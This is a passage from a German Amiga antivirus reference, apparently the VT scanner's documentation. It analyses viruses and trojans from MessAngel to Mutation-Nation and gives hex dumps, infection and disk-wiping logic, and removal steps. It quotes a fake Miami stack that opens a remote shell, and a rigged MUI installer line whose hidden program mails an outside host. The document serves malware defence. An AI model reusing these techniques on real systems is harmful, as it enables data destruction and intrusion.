  1782.          Im BB ist uncodiert zu lesen:
  1783.             284118fc 004518fc 004c18fc 004518fc (A...E...L...E..
  1784.             004e18fc 004918fc 00216000 007a48e7 .N...I...!`..zH.
  1785.          Das Virusteil arbeitet teilweise mit absoluten Adressen
  1786.          ($F0, $124-$130 usw.).
  1787.          Ablauf:
  1788.          Ein Programm ruft DoIo auf:
  1789.          Zuerst wird nach -$1400(a6) das LW $4EEEFDD8 geschrieben.
  1790.          Ob da schon was wichtiges liegt, ist anscheinend unwichtig.
  1791.          Es war DoIo-Read:
  1792.          BB-Virus wird geschrieben (falls kein Schreibschutz)
  1793.          Es war DoIo-Write:
  1794.          Test ob LoadSeg schon verbogen.
  1795.          Falls ja, fuehre Orig.DoIo-Write aus.
  1796.          Falls nein, verbiege LoadSeg und dann Orig.DoIo-Write.
  1797.          Ein Programm ruft LoadSeg auf:
  1798.          - Test ob $DC002D schon 1: (nur bei einigen Amigas Uhr)
  1799.            Falls ja, wird LoadSeg der Name ELENI! uebergeben. Es fehlt
  1800.            zwar $0 am Schluss, aber was solls.
  1801.            Falls nein,
  1802.            Test auf Schreibschutz ($99)
  1803.            Rette Filename Laenge max 25+1 . Und wenn der Filename (+Pfad)
  1804.            laenger ist ???
  1805.            Test auf Filelaenge max #100000 .
  1806.            Rette Filelaenge nach $F0  !!!!!!
  1807.            Suche im File bis zu einer bestimmten Tiefe nach LW $4EAEFDD8
  1808.            (waere bei exec OpenLib, bei einer anderen Lib etwas anderes.
  1809.            Koennte aber zufaellig auch in einem gecrunchten File vorkom-
  1810.            men). Ersetze dieses LW durch $4EAEEC00.
  1811.                 4EEEFDD8   JMP -$0228(A6)
  1812.                 4EAEFDD8   JSR -$0228(A6)
  1813.                 4EAEEC00   JSR -$1400(A6)
  1814.            Schreibe File zurueck und dann Orig.LoadSeg .
  1815.            Das bearbeitete File koennte also laufen, solange das Virusteil
  1816.            im Speicher ist. Ohne Virusteil im Speicher sehen Sie sicher
  1817.            den GURU.
  1818.          VT findet solche veraenderte Files NICHT !!!
  1819.          Falls Sie also auf eine Disk mit MessAngel-Virus treffen und
  1820.          einige Files laufen nicht, dann nehmen Sie einen Filemonitor.
  1821.          Geben Sie als Suchstring $4EAEEC00 ein und ersetzen Sie das LW
  1822.          bei Bedarf durch $4EAEFDD8. Hinweis: Die Veraenderung kann in
  1823.          einem File MEHRFACH vorkommen.
  1824.  
  1825.  
  1826.     - METAMORPHOSIS V1.0   BB und Link     auch KS2.04  immer ab $7FA72
  1827.          Fordert trackdisk.device NICHT !!!
  1828.          Cold, DoIo, OldOpenLib,  im Prg. noch Cool
  1829.          Im BB und im verseuchten File ist zu lesen:
  1830.          -METAMORPHOSIS V1.0- the next Generation from LAMER-EXTERMINATOR !
  1831.          Schaeden:
  1832.          Sobald der Wert in der Zaehlzelle groesser als $14 ist,
  1833.          Kopfstep alle Laufwerke.
  1834.          NeuBoot dieser Disk ergibt bei mir einen Requester:
  1835.          Volume has a read/write error    (Tracks defekt) nicht mehr
  1836.          viel zu retten.
  1837.          Vermehrung:
  1838.          mit DoIo = BB
  1839.          mit OldOpenLib = Link an File als 1.Hunk
  1840.          Linkbedingungen:
  1841.          - sucht c:           (bei mir NUR da, steht auch so im Prg.)
  1842.          - und dann mit examine, exnext usw Files
  1843.          - kein Schreibschutz
  1844.          - File ausfuehrbar  $3F3
  1845.          - File kleiner #40000
  1846.          - File noch nicht befallen
  1847.  
  1848.          Fuer die Hunk-Bestimmung nimmt das VirusPrg. die IRQ-Methode.
  1849.          Befallene Files sind lauffaehig .
  1850.          Verlaengert ein File um 1060 Bytes.
  1851.          KEIN Eintrag in startup-sequence .
  1852.          Keine Textmeldung des VirusPrg's .
  1853.  
  1854.          Ausbau mit VT getestet: 11.04.92
  1855.  
  1856.          Hinweis: Da alle Files in c: verseucht sein koennen, sollten
  1857.             Sie ueberlegen, ob es nicht schneller ist, alle Files neu
  1858.             von c einer OrigWB-Disk zu kopieren. Dann brauchen Sie mit
  1859.             VT nur noch aus Files den Link-Hunk auszubauen, die auf
  1860.             der Orig-WB-Disk NICHT vorhanden waren.
  1861.  
  1862.    - MEXX     SCA-Clone
  1863.       Text:          Hello there...
  1864.                      Here I'm again...
  1865.                      I've infected ya Disx !
  1866.                      I'm a simple VIRUS
  1867.                      and I came from a group called
  1868.                       --- MEXX ---
  1869.                       Yeah, reset now !!!
  1870.                      Or I will infect more!
  1871.  
  1872.    - MGM89     anderer Name: MEGAMASTER   s.o.
  1873.  
  1874.    - MG's Virus V1.0 (BB)  auch mit KS2.04, aber NICHT mit 68030
  1875.          KickTag, KickCheckSum, SumKickData, GetMes, BeginIo
  1876.          AddIntSer (5 = Vert. Beam)
  1877.          Codiert mit   not.w (a1)+
  1878.          Decodiert im Speicher zu lesen: MG's Virus V1.0
  1879.          Meldet sich nicht.
  1880.          Taeuscht sauberen Bootblock vor bei verbogenen Vektoren
  1881.          Vermehrung bei:
  1882.           - Lesen oder schreiben Block 0
  1883.           - Format Disk
  1884.  
  1885.    - Miami.21g Fake
  1886.          Filename: Miami.020  Laenge: 407596 Bytes
  1887.          Archivname: DC-MI21G.lha
  1888.          nach FileID:
  1889.                   .________________
  1890.               ____¦____  (   _____/__  - -------------
  1891.             _/     ___/ _/\_  T     ¬\_ ·  diGiTAL   ·
  1892.           .-\     ¦/    7--7  l       / · cORRUPTiON ·
  1893.           |  \____.-----¦  ¦----.____/------- -  -   -
  1894.           |   ¯¯¯¯¯             ¯¯¯¯¯
  1895.           |    Miami 2.1g - MUI based TCP/IP stack
  1896.           |    Cracked executables with fake keys!
  1897.           |
  1898.           `-[15/09/97]-------------------------[ 7eN ]
  1899.         Aber auf der Miami-Homepage war zu lesen:
  1900.         <p>Note: The current version 2.1g is identical to 2.1f
  1901.         except for a new version of MiamiRegister. If you are
  1902.         currently using 2.1f and have already registered then you
  1903.         do <em>not</em> need to download 2.1g.</p>
  1904.         Also gab es KEINE 2.1g-Version ?????
  1905.         Aktuell war im Nov. 97 die 2.1p-Version
  1906.         Die Gefahr duerfte also nur noch gering sein.
  1907.         Filevergleich:
  1908.             2.1g-Fake                   2.1f-Orig
  1909.          64617920 73747265 day stre : 64617974 696d6520 daytime
  1910.          616d2074 63702064 am tcp d : 73747265 616d2074 stream t
  1911.          6f732062 696e2061 os bin a : 6370206e 6f776169 cp nowai
  1912.          206e6577 636c6920  newcli  : 7420726f 6f742069 t root i
  1913.          7463703a 37373000 tcp:770. : 6e746572 6e616c00 nternal.
  1914.          64617974 696d6520 daytime  : 64617974 696d6520 daytime
  1915.                ;.....
  1916.          49002456 45523a20 I.$VER:  : 49002456 45523a20 I.$VER:
  1917.          4d69616d 6920322e Miami 2. : 4d69616d 6920322e Miami 2.
  1918.          31672028 31352e30 1g (15.0 : 31662028 33312e30 1f (31.0
  1919.          392e3937 29004e6f 9.97).No : 382e3937 29004e6f 8.97).No
  1920.                ;.....
  1921.          73656c65 63740000 select.. : 73656c65 63740000 select..
  1922.          594f2f0c 2f4e0004 YO/./N.. : 2f0c49f9 00008000 /.I.....
  1923.          49f90000 80002f08 I...../. : 2f086100 fee8584f /.a...XO
  1924.                ;usw....
  1925.         Schaden:  (Fremdaussage)
  1926.         Ok guyz so this is supposed to be a dC release
  1927.         of Miami 2.1g...cept those guyz didn't do it
  1928.         What it IS however is a totally pathetic attempt
  1929.         to release a fake in order to gain access to machines it
  1930.         is run on.
  1931.         The concept is that some sucker runs this crap and
  1932.         then n e 1 can telnet or letnet to their port 13 and all
  1933.         going to plan the remote sys will get a juicy shell prompt
  1934.         to steal various goodies like Miami.default etc :)
  1935.         Now for the funny bit...this is so poorly done its
  1936.         the work of a braindead simpleton, and I'm not even sure
  1937.         that it works because of the implementation as there are
  1938.         a few things it relies on...yes thats right, it still
  1939.         needs some help :)
  1940.         - You must MANUALLY configure this version in
  1941.           Miami.
  1942.         - Importing previous settings or using MiamiInit
  1943.           stuffs up their plan (Methinks).
  1944.         - A rudimentary Miami Firewall screws it totally.
  1945.         - You have to be stupid enuff not to notice the
  1946.           CLI bit in the database settings
  1947.         Is all the above likey...hahaha....NO!
  1948.         So in summary...thanx to the guyz that did this, it made
  1949.         my somewhat boring and miserable day...I laughed for ages!
  1950.                           - Later RaMoNsTeR :)
  1951.        Ich hoffe es gibt diese Version wirklich nicht im Original
  1952.        (siehe oben), sonst koennte es zu Fehlerkennungen kommen.
  1953.        VT bietet Loeschen an.
  1954.  
  1955.  
  1956.    - MicroSystems  BB   FastMem ja  nur KS1.2
  1957.       holt selbst Namen aus ROM (z.B. dos.library)
  1958.       Cool und Cold
  1959.       im Prg. bei Bedarf: AddTask, RemTask und DoIo
  1960.       Vermehrung: ueber BB
  1961.       Textausgabe ueber Graphikroutine
  1962.       unverschluesselt steht im BB:
  1963.       YOUR AMIGA IS INFECTED BY
  1964.       A NEW GENERATION OF VIRUS
  1965.       CREATED IN SWEDEN BY
  1966.       MICROSYSTEMS
  1967.  
  1968.    - MicroSystems-CBM  BB   Clone  s.o.
  1969.       nur Text geaendert.
  1970.            79726967 68746564 20627920 62696720 yrighted by big
  1971.            205d830c 436f6d6d 6f646f72 65204147  ]..Commodore AG
  1972.  
  1973.  
  1974.    - Micro-Master  ( noch ein SCA! )
  1975.  
  1976.  
  1977.    - Minus-Hunklaenge    (Fehlermeldung)
  1978.        VT glaubt beim Filetest ein File gefunden zu haben, das an der
  1979.        Stelle $14 den Wert $FFFFwxyz enthaelt. Nach meiner Meinung er-
  1980.        geben die vier F eine negative Hunklaenge und das ist nicht
  1981.        moeglich. Das File duerfte so unbrauchbar sein (ausprobieren).
  1982.        Entstehung:
  1983.        Moeglicherweise bei einem frueheren Virusausbau
  1984.        Abhilfe:
  1985.        Suchen Sie nach $3E9 (Hunkcode) und schreiben Sie das Langwort,
  1986.        das danach folgt, auch nach $14. Mit etwas Glueck ist das File
  1987.        danach wieder brauchbar.
  1988.  
  1989.  
  1990.    - MODEMCHECK-Virus    File
  1991.               Installprogramm   Laenge CrunchMania gepackt: 15516 Bytes
  1992.                                 Laenge ungepackt          : 22252 Bytes
  1993.               Virusprogramm loadwb  Laenge: 3604 Bytes
  1994.        Installablauf:
  1995.          Es werden angeblich verschiedene Modemleitungen getestet und
  1996.          die Ergebnisse in der Shell ausgegeben. Aber auch ohne Modem
  1997.          wurden bei mir alle Leitungen mit OK ausgegeben. In Wirklich-
  1998.          keit wird c/loadwb kopiert. Ein mitlaufendes Snoopdos-Programm
  1999.          wird abgeschaltet.
  2000.        Zerstoerungsablauf:
  2001.          Nach einem Reset muss loadwb neu geladen werden. Der loadwb-
  2002.          Befehl wird ausgefuehrt, wenn eine KS 36 oder hoeher vorliegt.
  2003.          Ausserdem wird IMMER ein Prozess Diskdriver.proc gestartet.
  2004.          Mit KS1.3 ist also nach diesem Befehl keine Arbeit auf der WB
  2005.          moeglich, wodurch jeder Benutzer gewarnt sein sollte.
  2006.          Bevor die Zerstoerung beginnt, werden noch einige Tests durchge-
  2007.          fuehrt:
  2008.            - ein Speicherbereich wird mit eori.b #$8E,d0 decodiert.
  2009.              Es ergibt sich S:HORSE
  2010.              Es wird nun versucht dieses File zu oeffnen. Falls ja,
  2011.              dann Programmende. Also wahrscheinlich ein Schutz fuer
  2012.              den Programmierer.
  2013.            - Ueber DosEnvec Test ob
  2014.                - mehr als 22 Sektoren >$16=#22=21+1¸
  2015.                - oder mehr als 90 Zylinder HighCyl>$5a =#90=89+1
  2016.                - oder mehr als 2 Koepfe
  2017.              falls nicht mindestens eine Bedingung erfuellt ist Abbruch
  2018.          Das Virusteil hat bei mir NIE sofort mit der Zerstoerung be-
  2019.          gonnen . DosDelay = $7530 = 10 Minuten
  2020.          Durch die Zerstoerungsroutine werden die Bloecke mit FUCK
  2021.          aufgefuellt. s.u.
  2022.          Es gibt leider KEINE Rettung fuer das Medium. Es bleibt nur
  2023.          Format.
  2024.            lZ 0 Bl 0
  2025.              00: 4655434b 4655434b 4655434b 4655434b FUCKFUCKFUCKFUCK
  2026.              10: 4655434b 4655434b 4655434b 4655434b FUCKFUCKFUCKFUCK
  2027.              20: 4655434b 4655434b 4655434b 4655434b FUCKFUCKFUCKFUCK
  2028.               usw.
  2029.          Hinweis: Der Rigid-Bereich war nicht betroffen, da dieser Be-
  2030.           reich mit DosEnvec nicht erreicht werden kann.
  2031.            pZyl 0 Bl      0  RDSK-Bl ChS: ok
  2032.              00: 5244534b 00000040 af6aa877 00000007 RDSK...@.j.w....
  2033.              10: 00000200 0000003a ffffffff 00000001 .......:........
  2034.              20: 00000002 ffffffff ffffffff ffffffff ................
  2035.              30: ffffffff ffffffff ffffffff ffffffff ................
  2036.              40: 000004fb 00000022 00000002 00000001 ......."........
  2037.              50: fffffffe 00000000 00000000 00000000 ................
  2038.              60: 00000000 00000000 00000000 00000000 ................
  2039.              70: 00000000 00000000 00000000 00000000 ................
  2040.              80: 00000000 00000043 00000001 000004fa .......C........
  2041.              90: 00000044 00000000 00000034 00000000 ...D.......4....
  2042.              a0: 53795175 65737420 53513535 35202020 SyQuest SQ555
  2043.              b0: 20202020 20202020 46354520 47565000         F5E GVP.
  2044.              c0: 00000000 47565053 43534928 23312129 ....GVPSCSI(#1!)
  2045.              d0: 00000000 414c4c00 00000000 00000000 ....ALL.........
  2046.               usw.
  2047.          Hinweis 2: VT versucht den Prozess abzuschalten. Da Prozesse
  2048.          im Amiga nur schwer abzuschalten sind, KANN es zu einem Ab-
  2049.          sturz kommen, MUSS aber nicht. Ich habe es 10x ohne Absturz
  2050.          geschafft, den AKTIVEN Prozess zu entfernen.
  2051.          Hinweis 3: Bitte vergessen Sie nicht, den Original-LoadWB-Be-
  2052.          fehl neu aufzuspielen, da VT nur loeschen fuer das Virusteil
  2053.          anbietet.
  2054.          Hinweis Feb 94:
  2055.            Es sind einige File mit dem Namen loader o. loadwb und der
  2056.            Laenge 3604 Bytes aufgetaucht. Aus der Laenge ist schon ab-
  2057.            zusehen, dass es sich um eine Umbenennung des loadwb-Virus-
  2058.            teils handelt. Ausserdem wurden einige Texte im File geaen-
  2059.            dert. MUESSEN von VT als Virus erkannt werden !!
  2060.          Zerstoerung loader Typ B:   (DiskSalv 3.01 Loader ???)
  2061.            lZ 0 Bl 0
  2062.              00: 444c5420 444c5420 444c5420 444c5420 DLT DLT DLT DLT
  2063.              10: 444c5420 444c5420 444c5420 444c5420 DLT DLT DLT DLT
  2064.          Zerstoerung loader Typ C:
  2065.            lZ 0 Bl 0
  2066.              00: 20544149 20544149 20544149 20544149  TAI TAI TAI TAI
  2067.              10: 20544149 20544149 20544149 20544149  TAI TAI TAI TAI
  2068.          Zerstoerung loader Typ D:
  2069.            lZ 0 Bl 0
  2070.              00: 4c414d45 4c414d45 4c414d45 4c414d45 LAMELAMELAMELAME
  2071.              10: 4c414d45 4c414d45 4c414d45 4c414d45 LAMELAMELAMELAME
  2072.            Es ist leider KEINE Rettung moeglich.
  2073.          Hinweis 5:  vgl. auch  666!-Trojan
  2074.  
  2075.    - Mongo09-BBS   Einbruchswerkzeug in BBS
  2076.          siehe bei ZonderKommando 1  (Name nachvollziehbar)
  2077.  
  2078.    - Mongo51-BBS   Einbruchswerkzeug in BBS
  2079.          siehe bei ZonderKommando 2  (Name nicht nachvollziehbar)
  2080.  
  2081.    - Morbid Angel   Forpib-Clone   s.o.
  2082.          nur sichtbarer Text und einige unwichtige Bytes wurden
  2083.          geaendert.
  2084.  
  2085.    - MOSH.1.0-BB-Virus  anderer moeglicher Name: SILESIAN-BB-Virus
  2086.          Bitte NICHT mit anderen MOSH-BBen verwechseln !!!!
  2087.          Fordert trackdisk.device NICHT .
  2088.          KS2.04: ja
  2089.          Im Speicher immer ab $7F800
  2090.          Belegt Speicher NICHT mit allocmem. Folge: Andere Programme
  2091.          (z.B. VT) koennen das Virusteil ueberschreiben. Dann stehen
  2092.          UNMOEGLICHE Werte in DoIo usw. . Ein GURU droht.
  2093.          Verbogen: DoIo, KickTag, KickCheckSum
  2094.          Mehrfach decodiert mit  eori.b xy,(a1)+  ist zu lesen:
  2095.            61727900 14a50a20 48455920 21202049 ary.... HEY !  I
  2096.            604d2020 4d4f5348 20766572 73696f6e `M  MOSH version
  2097.            20312e30 004628c8 19464952 53542053  1.0.F(..FIRST S
  2098.            494c4553 49414e20 56495255 53004632 ILESIAN VIRUS.F2
  2099.            b9285772 69747465 6e206279 20746865 .(Written by the
  2100.            20626573 74204d2e 472e0046 3c783253  best M.G..F<x2S
  2101.            70656369 616c2067 72656574 696e6773 pecial greetings
  2102.            20746f3a 20432e49 2e412e20 616e6420  to: C.I.A. and
  2103.            4b2e4741 524c454a 00464664 3c426969 K.GARLEJ.FFd<Bii
  2104.            69672066 75636b69 6e672074 6f3a204b ig fucking to: K
  2105.            415a494f 20535445 494e484f 46462061 AZIO STEINHOFF a
  2106.            6e642044 2e4b2e42 49540000 414e4420 nd D.K.BIT..AND
  2107.            6e6f7720 53455249 4f555320 49204c4f now SERIOUS I LO
  2108.            56452042 45415441 2042206d 79204245 VE BEATA B my BE
  2109.            53542067 69726c20 46726965 6e642068 ST girl Friend h
  2110.            61766520 796f7520 41494453 203f2069 ave you AIDS ? i
  2111.            66206861 76652069 74206669 6e652069 f have it fine i
  2112.            206f6c73 6f206861 7665206f 6e650007  olso have one..
  2113.          Vermehrung: BB
  2114.          Textausgabe: DisplayAlert (HEY..)
  2115.          Schaeden in Abhaengigkeit von einer Zaehlzelle (#5):
  2116.           a) Schreibt BB-Virus
  2117.           b) Schreibt nach $6E000 (nur bei DD-Disk Rootblock)
  2118.              Text. Versuchen Sie mit DiskSalve zu retten, was
  2119.              noch zu retten ist.
  2120.            414e4420 6e6f7720 53455249 4f555320 AND now SERIOUS
  2121.            49204c4f 56452042 45415441 2042206d I LOVE BEATA B m
  2122.              usw.
  2123.           c) Zerstoert Block ab $2800 (Bl20+0=Bl21). Ein File das
  2124.              diesen Block verwendet, ist NICHT zu retten. Es handelt
  2125.              sich hierbei um ein codiertes Textteil.
  2126.                   pZyl 0  Bl 20
  2127.            beb1bbdf 919088df acbaadb6 b0aaacdf ................
  2128.            b6dfb3b0 a9badfbd babeabbe dfbddf92 ................
  2129.            86dfbdba acabdf98 968d93df b98d969a ................
  2130.  
  2131.  
  2132.    - MOSH1-BB     Cool, nach Reset auch $68 immer ab $7C000
  2133.          soll Virusdemo sein (so ein Schwachsinn)
  2134.          keine Vermehrung, codiert mit MOSH, eor.l d0,(a0)+
  2135.          ueber $68 und in Abhaengigkeit von Zaehlzelle (Cmpi.l #$190,(a0))
  2136.          Textausgabe ueber Graphikroutine:
  2137.          schwarzer Hintergrund, Gelbe Schrift
  2138.             MAFIA PLK  usw
  2139.          da Endlosschleife Reset notwendig
  2140.          dringende Empfehlung: loeschen
  2141.  
  2142.    - MOSH2-BB s.o keine Vermehrung
  2143.       KS2.04: nach Reset Absturz
  2144.       Zusaetzlich nach reset oldopenlib verbogen und ueber displayAlert
  2145.       Textausgabe: Hey you old lame   usw.
  2146.       Da keine Vermehrungsroutine eigentlich kein Virus
  2147.       Dringende Empfehlung: sofort loeschen
  2148.  
  2149.  
  2150.    - Mount-972-Virus   siehe bei B.E.O.L.-LVirus
  2151.  
  2152.  
  2153.    - Mount.BB-Virus    BB   1024 Bytes
  2154.        Fundort z.B.: CD-LSD1:A/Leisure/MultitaskingGames/cheatModeC.DMS
  2155.                      (1.Ausgabe)
  2156.        Fordert trackdisk.device NICHT
  2157.        Cool, DoIo, SumKickData
  2158.        KS2.04 mit 68030: Ja
  2159.        Speicherlage: $7F400 oder $FE000 (wird mit #$4e70 getestet)
  2160.        Im BB ist zu lesen:
  2161.            4cdf7fff 6000fe5a 01432f4d 6f756e74 L..`..Z.C/Mount
  2162.            0000432f 44000000 00000000 00000000 ..C/D...........
  2163.                    ;.......
  2164.            4e75646f 732e6c69 62726172 79005359 Nudos.library.SY
  2165.            533a432f 44000000 00000000 00000000 S:C/D...........
  2166.        Schaeden:
  2167.         - es wurde ein Lese-Zugriff mit DoIo versucht:
  2168.            - schreibt Virus-BB.
  2169.         - es wurde ein Schreib-Zugriff mit DoIo versucht:
  2170.            Test #$1111,$F80000 (gefunden=Abbruch)
  2171.            Test #$99,$320 (nicht gefunden=Abbruch)
  2172.            - versucht in C/Mount (Laenge 208 Bytes) anzulegen.
  2173.            - versucht in C/D (Laenge 1024 Bytes = Virus-BB) anzulegen.
  2174.          Diese Vorgehensweise ist neu !!
  2175.      Hinweis:
  2176.        Fehlerquelle  Stand: Anfang April 94
  2177.        Bei aktivem Mount.BB-Virus im Speicher erkennen einige Antivirus-
  2178.        programme "Gremlins-Virus" und versuchen die Original-Vektoren
  2179.        wieder zu setzen. Da die Vektorensicherung beim Mount.BB-Virus
  2180.        an einer anderen Stelle stattfindet, verursachen diese Prg.e
  2181.        einen Systemabsturz.
  2182.        Ich nehme an, dass der Fehler in den entsprechenden Programmen
  2183.        beim naechsten Update (Mai 94 ?) behoben wird.
  2184.      Hinweis:
  2185.        Dieser BB wird auch als ELENI-BB-Virus gefuehrt. Bitte
  2186.        verwechseln Sie den BB nicht mit dem ELENI-Clock-BB-Virus.
  2187.        Im BB des Mount.BB-Virus ist auch zu lesen:
  2188.            464d464f 4a20584a 53565420 56322e32 FMFOJ XJSVT V2.2
  2189.        Wenn Sie nun #1 von den Bytes abziehen, ergibt sich:
  2190.            454c454e 49205749 52555320 56322e32 ELENI WIRUS V2.2
  2191.        Im dt. Alphabet kommt halt vor X W und nicht V.
  2192.  
  2193.    - Mount.BB-Inst1    File    Laenge: 66424 Bytes
  2194.        An ein gepacktes XCopy wurde mit der 4EB9-4EF9-Methode ein Virus-
  2195.        teil gelinkt.
  2196.        Diese Teil wird beim Aufruf von XCopy im Speicher installiert
  2197.        und aktiviert.
  2198.        VT bietet Ausbau an. Das verbleibende XCopy ist gepackt.
  2199.        Ob dieses XCopy (XCopy 4.93) echt ist, kann ich nicht beurteilen.
  2200.        Das Datum laesst auf eine ueberholte Version schliessen. Da Sie
  2201.        sowieso keine Raubkopie verwenden, besorgen Sie sich bitte die
  2202.        neueste Version bei der Vertreiberfirma.
  2203.  
  2204.    - Mount.BB-Inst2
  2205.        Zwei Files in C
  2206.         - Mount Laenge: 208 Bytes
  2207.         - D     Laenge: 1024 Bytes  (BB-Virus-Data)
  2208.        VT sucht nach Mount und bietet Loeschen an. Falls VT Mount findet,
  2209.        wird ohne Rueckfrage auch nach dem File D gesucht, und bei Bedarf
  2210.        geloescht. Bitte spielen Sie danach von der Orig-WB-Disk den
  2211.        mount-Befehl neu auf.
  2212.        ABER ein Problem bei AKTIVEM Virusteil !!!!!!!!!!!!
  2213.        Das Programm "vergisst" einen Lock freizugeben. VT meldet beim
  2214.        Filetest Objekt in use . Das Teil kann also dann so nicht geloescht
  2215.        werden.
  2216.        Schnelle Abhilfe:
  2217.        Setzen Sie mit VT die Original-Vektoren.
  2218.        Booten Sie dann von einer SAUBEREN Diskette neu. Ein Booten von
  2219.        der Festplatte ist NICHT sinnvoll, da dann ja der Mount-Befehl
  2220.        aufgerufen wuerde. Loeschen Sie dann mit VT die beiden Files in c .
  2221.        Dieses Virusteil zeigt, dass es sinnvoll ist, den Rigid-BB oder den
  2222.        Rigid-Zylinder der Festplatte ab und zu auf eine leere Disk zu
  2223.        sichern. Dann ist im Schadensfall ein Zurueckspielen moeglich und
  2224.        ein Format Festplatte kann wahrscheinlich vermieden werden.
  2225.        Schadensverlauf:
  2226.        Fast in jeder startup-sequence wird der mount-Befehl aufgerufen.
  2227.         - Dieser falsche Mount-Befehl versucht nun SYS:C/D (=BB-Virus-Data)
  2228.           nach $7F000 in den Speicher zu laden.
  2229.         - Sprung nach $7F00C
  2230.         - Kopieren des Virus-BB nach $7F400 oder $FE000
  2231.         - Verbiegen der Vektoren
  2232.         - usw.
  2233.        Die frueher vorhandenen Mount-Anweisungen werden von dem Virusteil
  2234.        (nur 208 Bytes) NICHT ausgefuehrt !!!
  2235.  
  2236.  
  2237.    - mount-Virus   Laenge: 1072   KEINE verbogenen Vektoren
  2238.       reines Zerstoerungsprogramm  KS1.3: NEIN  GURU 3  KS2.04: JA
  2239.       laeuft aber unter KS2.04 mit ORIG-Mount-Befehl von KS1.3 .
  2240.       Guru-Fehler liegt im VirusPrg.
  2241.       Von der Definition KEIN Virus, da keine Vermehrung.
  2242.       Namensbegruendung: im File ist am Anfang zu lesen
  2243.                                           633A               c:
  2244.            6D6F756E 74000000 00000000 00000000 mount...........
  2245.       Liegt in c: als mount Laenge 1072
  2246.       Braucht in c:why . Wird von mount-Virus aufgerufen. Der why-
  2247.       Befehl ist ein umbenannter Original-Mount-Befehl. Die Version
  2248.       des Original-Mount-Befehls spielt keine Rolle. (wurde getestet)
  2249.       Den why-Befehl gibt es unter KS2.04 NICHT mehr in c: !!!!
  2250.       Ablauf:
  2251.       In jeder s-seq ist wahrscheinlich der mount-Befehl enthalten.
  2252.         mount aux   usw.
  2253.       Das Virus-Mount-Prg. wird also gestartet.
  2254.       Das VirusPrg. sucht sich selbst (c:mount) und ueberprueft ob die
  2255.       Zaehlzelle im Prg. schon den Wert #20 erreicht hat. Wenn nein,
  2256.       wird der Zaehler um 1 erhoeht und zurueckgeschrieben (open, seek,
  2257.       read, write, close). KEINE Gefahr !!!
  2258.       Wenn ja : Zaehlerzelle = #20
  2259.       Aufruf von c:why  (= Orig.-mount) mit execute
  2260.       Suche in Liste nach DH    (also keine Zerstoerung von df0: usw.)
  2261.       Info besorgen, Blockanzahl besorgen, allocmem leer Blocklaenge,
  2262.       Mit DoIo ueber Schleife jeden Block leer neu schreiben.
  2263.       Wenn fertig Motor aus. Suche in Liste naechstes DH .
  2264.       Sie koennen so ihre Festplatten ohne Probleme unbrauchbar machen.
  2265.                           Tests wurden durchgefuehrt mit df0:
  2266.       gemountet als DH0: . Erfolg siehe oben
  2267.  
  2268.       Fileerkennung getestet mit VT : 28.09.92
  2269.       Empfehlung: mount und why einfach loeschen und neu aufkopieren.
  2270.  
  2271.       Nachtrag 06.01.93: Ein User hat das Install-Programm gefunden.
  2272.       siehe bei SMBX-Mount Virus
  2273.  
  2274.    - Mount-2-Trojan  File in s  Clone   Laenge: 784 Bytes
  2275.        Rest siehe oben bei Aibon2-Mount2-Clone
  2276.  
  2277.    - MsgTop V1.0   siehe oben Devil_11_B.Door
  2278.          Laenge gepackt: 13548   VT erkennt Imploder
  2279.          Laenge einmal entpackt: 17884  VT erkennt Devil_11
  2280.  
  2281.    - MST-VEC Virus  File    s.o. CLP-Virus Clone2 oder DOOR BELLS
  2282.  
  2283.    - MST-Inte Virus  File   s.o. CLP-Virus Clone2
  2284.  
  2285.    - MUI40-Fake  (war kurz im Aminet)
  2286.        Keine Vermehrung
  2287.        Eine Nachricht soll verschickt werden
  2288.        Mind. drei Files veraendert.
  2289.        Empfehlung: Loeschen und sauberes Archiv neu aufspielen.
  2290.  
  2291.       Install  Fake-L: 27034
  2292.        Es wurde eine Zeile eingefuegt und Zahlen geaendert:
  2293.        ; $VER: Install-MUI 4.0 (01.04.99)
  2294.        (set current_version "4.0")
  2295.        (set current_libver  19)
  2296.        (set lng @language)
  2297.        (set #tmpdir "t:mui.inst")
  2298.        (complete 0)
  2299.        (run (cat "goodies/clickforcolors"))   <---- diese Zeile
  2300.  
  2301.       MUI     Fake-L: 7536
  2302.        Datum geaendert und Text-Hunk angehaengt
  2303.           4e752456 45523a20 4d554920 32312e31 Nu$VER: MUI 21.1
  2304.           34202830 312e3034 2e393929 00000000 4 (01.04.99)....
  2305.           ;......
  2306.           00000000 000003f2 000003f1 0000000f ................
  2307.           77616861 68616861 68616861 20417072 wahahahahaha Apr
  2308.           696c2046 6f6f6c73 20796f75 20736f72 il Fools you sor
  2309.           72792061 73736564 20486f70 6566756c ry assed Hopeful
  2310.           204d6f74 68657266 75636b21 000003f2  Motherfuck!....
  2311.  
  2312.       ClickForColors Fake-L: 1340
  2313.        Normal ein Txt-File jetzt ein PRG. (nicht codiert)
  2314.           6e696d62 75732e73 75706572 696f722e nimbus.superior.
  2315.           6e657400 62736473 6f636b65 742e6c69 net.bsdsocket.li
  2316.           62726172 79004845 4c4f2073 6173672e brary.HELO sasg.
  2317.           636f6d0d 0a004d41 494c2046 524f4d3a com...MAIL FROM:
  2318.           3c706973 73656420 75736572 3e0d0a00 <pissed user>...
  2319.           52435054 20544f3a 7374756e 747a4073 RCPT TO:stuntz@s
  2320.           6173672e 636f6d0d 0a004441 54410d0a asg.com...DATA..
  2321.           00005375 626a6563 743a204d 6f766520 ..Subject: Move
  2322.           796f7572 206e617a 69206173 73207769 your nazi ass wi
  2323.           7468206f 7572204d 55492075 70646174 th our MUI updat
  2324.           65206375 6e74210d 0a0d0a2e 0d0a0000 e cunt!.........
  2325.     
  2326.    - muTAgeN1 ??      Codierteil
  2327.          Es ist ein Teil aufgetaucht, mit dem jeder Virus codiert wer-
  2328.          den kann. Ein Decodierheader mit VARIABLER Laenge wird danach
  2329.          vor das jetzt codierte Virusteil gehaengt.
  2330.          VT versucht (!?!?) den Decodierheader bei Filetest zu finden.
  2331.          Es koennte zu Fehlerkennungen kommen !!!!!!
  2332.          Ich waere Ihnen dankbar wenn Sie diese Files etwas genauer
  2333.          untersuchen UND/ODER an einen Antivirusprogrammierer weiter-
  2334.          leiten wuerden. Danke
  2335.          Im Codierteil (nicht im DecodierHeader) ist zu lesen:
  2336.             303cfd84 4eb60000 5b6d7554 4167654e 0<..N...[muTAgeN
  2337.             315d0000                            1]..
  2338.  
  2339.  
  2340.    - Mutation-Nation-Virus    Link  
  2341.        Mind. KS 37
  2342.        Nicht Resetfest
  2343.        Fileverlaengerung: 1316 Bytes
